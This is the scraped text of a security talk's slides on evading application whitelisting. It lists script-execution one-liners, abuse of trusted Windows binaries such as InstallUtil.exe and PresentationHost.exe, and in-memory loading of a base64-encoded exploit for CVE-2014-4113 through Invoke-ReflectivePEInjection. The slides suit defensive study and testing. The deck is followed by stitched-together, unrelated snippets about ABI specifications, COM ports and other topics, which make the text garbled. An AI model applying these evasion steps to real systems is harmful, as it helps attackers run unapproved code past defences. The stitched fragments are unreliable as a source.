Simple Application Whitelisting Evasion Casey Smith @subTee
C:\>whoami
• Information Security Analyst – FirstBank , Colorado
• Internal Security Testing & Incident Response
Simple? – No Exploitation Necessary
Application Whitelisting - Quick
• Unknown/Unapproved Files Do Not Execute • File Hash • Directory • Publisher
Script
.NET
Native
Script Execution – Don’t Be Interesting
.bat
cmd.exe /k < script.txt
.vbs
cscript.exe //E:vbscript script.txt
.ps1
Get-Content script.txt | iex
DEMO # 1
.NET Execution
Sponsors = Trusted Things That Execute Things
“An attacker, is more interested in what an application can be made to do and operates on the principle that any action not specifically denied, is allowed” –OWASP Secure Coding Practices Quick Reference Guide
InstallUtil.exe
• Let this hatch payload • http://bit.ly/17iKrvf • Confuse Dynamic/Static Analysis
How Execution Events Can Be “Missed” • Loads Assembly with READ Permission • Later Changes Permission to EXECUTE • YOUR WHITELISTING APPLICATION CAN MISS THIS. • Thanks to @Bit9 and [ Matt L. & Chris L. ]
• Gain Initial Access • Browser Based Delivery • Try as Alternate To Java Applet Payload
PresentationHost.exe
• XAML Browser Application (XBAP)
• PresentationHost.exe File | Url
Native Execution – Create Custom Memory Loaders
Malwaria .NET Memory Native PE File Execution https://github.com/subTee/Malwaria Encrypt Native Payload – Unpack In Memory Execute
PowerShell = Best Sponsor
• Invoke-ReflectivePEInjection • Embed Native Image • Executes in PowerShell.exe Process
• Staged Execution Well Done PowerSploit Developers!
DEMO #3 CVE-2014-4113
a.exe
YS5leGU=
PowerShell
•Compile Exploit & Base64 Encode •Embed in Script or Host on Server •Invoke-ReflectivePEInjection.ps1
Other Tactics/Methods?
Living Off The Land – Not my idea… Brilliant. • https://www.youtube.com/watch?v=j-r6UonEkUw • Live In Memory • Use Only What is Available and Consistent • Using Pre-Existing/Trusted instead of New/Unapproved
âAn attacker, is more interested in what an application can be made to do and operates on the principle that any action not specifically denied, is allowedâ.
Cannot open a COM port: Firstly, view the device using the OS (e.g. device manager) to confirm that ..... with this Android and. iOS application from Nordic Semi.
Jan 28, 2018 - 0.98 Various clarifications and fixes according to feedback from Sun, thanks to ...... and the signals specified by signal (BA_OS) as shown in table 3.1. ...... same as the result of R_X86_64_DTPMOD64 for the same symbol. 5This documen
select the responses which are best matches to the user input ..... the last response when the bot talked about free ... User> go and take control the website that I.
Apr 13, 2016 - System V Application Binary Interface ... 4 Development Environment .... compiler generated function in a compilation unit, all FDEs can access.
There was a problem previewing this document. Retrying... Download. Connect more apps... Try one of the apps below to open or edit this item. tax evasion pdf.
Jun 17, 2016 - X87, the 16-bit exponent plus 6 bytes of padding belongs to class X87UP. ..... Basically code models differ in addressing (absolute versus.
What business goal was the project intended to deliver? ... the reliability of the software applications was improved (because our team developed unit tests and.
2. enrich this data with other related information like the weather in this area at this time. .... http://www.oracle.com/technetwork/articles/javase/index-140168.html.
pdf. The C++ object model that is expected to be followed is described in http: .... In addition to registers, each function has a frame on the run-time stack.
Jan 25, 2011 - implementations MUST make a best-effort attempt to free associated re- sources ...... saga::task t1 = f.read (100, buf1);. 26 saga::task t2 ...... Extended I/O GridFTP (which was designed for a similar target domain) introduced an ...
